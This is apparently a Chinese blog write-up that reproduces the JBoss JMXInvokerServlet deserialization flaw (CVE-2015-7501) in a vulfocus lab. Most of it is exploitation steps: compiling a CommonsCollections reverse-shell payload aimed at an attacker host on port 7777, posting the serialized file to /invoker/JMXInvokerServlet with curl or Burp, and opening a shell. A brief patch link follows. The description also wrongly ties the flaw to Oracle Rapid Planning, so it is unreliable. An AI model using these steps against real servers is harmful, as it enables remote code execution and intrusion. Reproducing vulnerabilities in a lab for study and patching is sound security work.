JBoss JMXInvokerServlet 反序列化漏洞 CVE-2015-7501 已亲自复现

Bolgzhang2023-12-23 22:56

JBoss JMXInvokerServlet 反序列化漏洞 CVE-2015-7501 已亲自复现

漏洞名称

漏洞描述

在Oracle Rapid Planning 12.1/12.2.2中发现了一个被归类为"严重"的漏洞。受到影响的是一些未知的组件处理中间层。升级可消除此漏洞。在泄露漏洞后立即发布了可能的缓解措施。

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

影响版本

Redhat Jboss_Operations_Network 3.0

Redhat Jboss_Enterprise_Brms_Platform 5.0.0

Redhat Jboss_Enterprise_Application_Platform 4.3.0

Redhat Jboss_Enterprise_Application_Platform 5.0.0

Redhat Jboss_Data_Virtualization 5.0.0

Redhat Jboss_Enterprise_Application_Platform 6.0.0

Redhat Xpaas 3.0.0

Redhat Jboss_Enterprise_Soa_Platform 5.0.0

Redhat Jboss_Fuse_Service_Works 6.0

Redhat Subscription_Asset_Manager 1.3.0

Redhat Jboss_Bpm_Suite 6.0.0

Redhat Data_Grid 6.0.0

Redhat Jboss_A-Mq 6.0.0

Redhat Jboss_Fuse 6.0.0

Redhat Jboss_Portal 6.0.0

Redhat Jboss_Data_Virtualization 6.0.0

Redhat Openshift 3.0

Redhat Jboss_Enterprise_Brms_Platform 6.0.0

Redhat Jboss_Enterprise_Web_Server 3.0.0

漏洞复现

环境搭建

受害者IP:192.168.63.129:65336

攻击者IP:192.168.63.1

vulfocus下载链接

bash 复制代码 
https://github.com/fofapro/vulfocus
git clone https://github.com/fofapro/vulfocus.git

启动vulfocus

bash 复制代码 
docker-compose up -d

环境启动后,访问http://192.168.63.129:65336即可看到一个Jboss页面,说明已成功启动。

访问路径/invoker/JMXInvokerServlet,若提示JMXInvokerServlet文件下载则说明可能存在漏洞;

漏洞利用

通过借助ysoserial的eCommonsCollections5利用链来复现。生成Payload,生成编译后的Java文件

ReverseShellCommonsCollectionsHashMap.class,生成ReverseShellCommonsCollectionsHashMap.ser文件,进行反弹shell。

bash 复制代码 
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap 192.168.63.1:7777
bash 复制代码 
curl http://192.168.63.129:65336/invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

使用burp看看响应体会返回什么,抓取原始请求的响应。

由于在处理/invoker/JMXInvokerServlet请求的时候会读取用户传入的对象,那我们可以构造恶意的数据传入,当jboss处理该数据时即可执行该恶意数据,从而达到执行任意代码的效果;

将生成的ReverseShellCommonsCollectionsHashMap.ser下载到本地,burp抓包后修改为post提交方式,接着右击paste from file上传生成的ReverseShellCommonsCollectionsHashMap.ser文件;(注:攻击机要先开启监听)

修复建议

Red Hat JBoss Portal任意代码执行漏洞(CVE-2015-7501)的补丁--- 登录红帽门户安装对应修复版本

补丁链接:https://access.redhat.com/security/vulnerabilities/2059393

总结

如果payload请求成功,在响应头中返回的状态码为200,在响应体中抛出 org.jboss.invocation.InvocationException异常信息,则需要结合网络日志和流量日志进行分析。如果返回其他状态码,则攻击失败。

相关推荐
lingggggaaaa12 小时前
小迪安全v2023学习笔记(六十二讲)—— PHP框架反序列化
笔记·学习·安全·web安全·网络安全·php·反序列化
Johny_Zhao13 小时前
基于 Docker 的 LLaMA-Factory 全流程部署指南
linux·网络·网络安全·信息安全·kubernetes·云计算·containerd·yum源·系统运维·llama-factory
黑客影儿15 小时前
Kali Linux 环境中的系统配置文件与用户配置文件大全
linux·运维·程序人生·安全·网络安全·系统安全·学习方法
小张的博客之旅21 小时前
宁波市第八届网络安全大赛初赛(REVERSE-Writeup)
学习·网络安全·reverse
athink_cn2 天前
HTTP/2新型漏洞“MadeYouReset“曝光:可发动大规模DoS攻击
网络·网络协议·安全·http·网络安全
小韩博2 天前
metasploit 框架安装更新遇到无法下载问题如何解决
linux·网络安全·公钥·下载失败
合作小小程序员小小店2 天前
SDN安全开发环境中常见的框架,工具,第三方库,mininet常见指令介绍
python·安全·生成对抗网络·网络安全·网络攻击模型
Whoami!2 天前
2-3〔O҉S҉C҉P҉ ◈ 研记〕❘ 漏洞扫描▸AppScan(WEB扫描)
网络安全·信息安全·appscan·oscp
Bruce_Liuxiaowei3 天前
跨站脚本攻击(XSS)高级绕过技术与防御方案
前端·网络安全·xss
人衣aoa4 天前
PG靶机 - Pelican
web安全·网络安全·渗透测试·内网渗透
热门推荐
01UV安装并设置国内源02Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code03DeepSeek更新!速览DeepSeek V3.1新特性04蜘蛛磁力 搜索引擎大全,如何使用蜘蛛磁力查找磁力链接05KGG转MP3工具|非KGM文件|解密音频06【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)072025最新国内服务器可用docker源仓库地址大全(2025年8月更新)08阿里开源首个图像生成基础模型——Qwen-Image本地部署教程,超强中文渲染能力刷新SOTA!09NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南10TRAE 规则(Rules)配置指南:个人习惯、团队规范与最佳实践